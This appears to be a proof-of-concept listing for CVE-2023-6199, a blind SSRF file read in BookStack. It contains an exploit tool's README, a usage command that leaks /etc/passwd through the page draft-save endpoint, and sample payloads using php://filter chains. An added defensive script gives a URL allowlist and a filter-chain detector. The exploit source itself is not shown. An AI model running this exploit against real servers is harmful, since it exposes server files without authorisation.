
CVE-2023-6199 PoC — BookStack Code Issue Vulnerability

Source
Associated Vulnerability
Title: BookStack Code Issue Vulnerability (CVE-2023-6199)
Description: BookStack is a simple, self-hosted, easy-to-use platform from BookStack for organizing and storing information. BookStack version 23.10.2 contains a code issue vulnerability: the flaw stems from allowing local files on the server to be filtered, which leaves the application vulnerable to SSRF attacks.
Description
A CLI to exploit parameters vulnerable to PHP filter chain error based oracle, modified to exploit CVE-2023-6199
Readme
# PHP filter chains: file read from error-based oracle. Updated Script to exploit CVE-2023-6199

A CLI to exploit parameters affected by the file read caused by the error-based oracle of PHP filter chains. It can be used to leak the content of a local file when passed to vulnerable functions, such as `file()`, `hash_file()`, `file_get_contents()` or `copy()`, even when the server does not return the file content!
In this case we use it to read files by exploiting an SSRF vulnerability in BookStack version 23.10.2, identified by CVE-2023-6199, which allows filtering local files on the server.
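As an added defender-side example (not part of this PoC and not BookStack's own code), the block below shows the two controls a practitioner wants against the technique the README describes: an allowlist check that a server-side fetcher applies to user-supplied URLs before following them, so `php://` wrappers never reach functions like `file_get_contents()`, and a classifier that flags `php://filter` chains (several `convert.iconv` steps plus `dechunk`, the hallmark of the error-based oracle) in captured request bodies. The function names, the step threshold and the sample requests are assumptions constructed for this example.

```python
"""Defender-side checks for php://filter chain abuse (added example).

Part 1: allowlist check for URLs a server fetches on behalf of users (mitigation).
Part 2: classifier for captured request bodies that flags filter-chain payloads
        (detection). The sample requests at the bottom are constructed, not real.
"""
import re
from urllib.parse import unquote, urlparse

# Only absolute http(s) URLs should ever be followed by a server-side fetcher.
ALLOWED_SCHEMES = {"http", "https"}


def is_allowed_fetch_url(url: str) -> bool:
    """Return True only for absolute http(s) URLs that carry a host.

    php://, file://, data:, ftp:// and scheme-less or protocol-relative values are
    rejected before they can reach file()/file_get_contents()-style functions.
    """
    try:
        parsed = urlparse(url.strip())
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    return parsed.scheme.lower() in ALLOWED_SCHEMES and bool(parsed.netloc)


# Signature pieces of the filter-chain oracle: the wrapper itself, charset
# conversion steps, and the dechunk filter used to turn a guess into an error.
FILTER_WRAPPER = re.compile(r"php://filter/", re.IGNORECASE)
ICONV_STEP = re.compile(r"convert\.iconv\.[\w-]+\.[\w-]+", re.IGNORECASE)
DECHUNK = re.compile(r"\bdechunk\b", re.IGNORECASE)


def classify_payload(raw: str, chain_threshold: int = 3) -> str:
    """Classify one request body as 'clean', 'filter-wrapper' or 'filter-chain-oracle'.

    Bodies arrive form/URL encoded (sometimes twice), so decode before matching.
    A lone php://filter reference is already worth an alert; a chain of iconv
    steps or a dechunk step is the oracle pattern. chain_threshold is an
    assumed tuning value, not a documented constant.
    """
    decoded = unquote(unquote(raw))
    if not FILTER_WRAPPER.search(decoded):
        return "clean"
    iconv_steps = len(ICONV_STEP.findall(decoded))
    if DECHUNK.search(decoded) or iconv_steps >= chain_threshold:
        return "filter-chain-oracle"
    return "filter-wrapper"


def scan_requests(records):
    """Return (request_id, verdict) for every record that is not clean."""
    findings = []
    for rid, body in records:
        verdict = classify_payload(body)
        if verdict != "clean":
            findings.append((rid, verdict))
    return findings


# Constructed sample request bodies (hypothetical, for this example only).
SAMPLE_REQUESTS = [
    # benign draft save embedding an ordinary remote image
    ("req-1", 'html=<p>hello</p><img src="http://example.com/logo.png">'),
    # plain php://filter read with a single encoding step
    ("req-2", 'html=<img src="php://filter/convert.base64-encode/resource=/etc/hostname">'),
    # URL-encoded chain with several iconv steps and dechunk (illustrative, not a working chain)
    ("req-3", "html=%3Cimg%20src%3D%22php%3A%2F%2Ffilter%2Fconvert.iconv.UTF8.UTF16"
              "%7Cconvert.iconv.L1.UCS-2%7Cconvert.iconv.UTF8.UTF32%7Cdechunk"
              "%2Fresource%3D%2Fetc%2Fpasswd%22%3E"),
]


if __name__ == "__main__":
    for url in ("http://example.com/logo.png", "php://filter/resource=/etc/passwd", "file:///etc/passwd"):
        print(f"{url!r:45} allowed={is_allowed_fetch_url(url)}")
    for rid, verdict in scan_requests(SAMPLE_REQUESTS):
        print(f"{rid}: {verdict}")
```

The allowlist check is the fix-side control: a fetcher that only follows `http`/`https` URLs with a host cannot be steered into a PHP stream wrapper no matter how the chain is built. The classifier is the detection-side control and deliberately decodes twice, because the payload in the README's example travels inside a form-encoded `html` parameter.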

## Example of Usage

```bash
$ python3 filters_chain_oracle_exploit.py --parameter html --headers '{"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}' --verb PUT --target http://localhost:80/ajax/page/your_page_number/save-draft --file '/etc/passwd'
```

```bash
[*] The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*] The following local file is leaked : /etc/passwd
[*] Running PUT requests
[*] Additionnal headers used : {"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}
[+] File /etc/passwd leak is finished!
```

## References

- [CVE-2023-6199 - MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6199)  
- [LFR via Blind SSRF in BookStack - Fluid Attacks](https://fluidattacks.com/blog/lfr-via-blind-ssrf-book-stack/?utm_source=mailing&utm_medium=activecampaign&utm_campaign=blognov22)  
- [PHP Filter Chains Oracle Exploit - Synacktiv](https://github.com/synacktiv/php_filter_chains_oracle_exploit)  
File Snapshot

```
[4.0K] /data/pocs/59ea3a10664bd81ce96c2cb3189aa889878eee6b
├── [4.0K] filters_chain_oracle
│   ├── [4.0K] core
│   │   ├── [ 16K] bruteforcer.py
│   │   ├── [6.3K] requestor.py
│   │   ├── [ 303] utils.py
│   │   └── [ 157] verb.py
│   └── [4.0K] tests
│       ├── [   0] __init__.py
│       └── [4.7K] test.py
├── [7.5K] filters_chain_oracle_exploit.py
├── [ 368] LICENSE
├── [1.7K] README.md
└── [   9] requirements.txt

3 directories, 10 files
```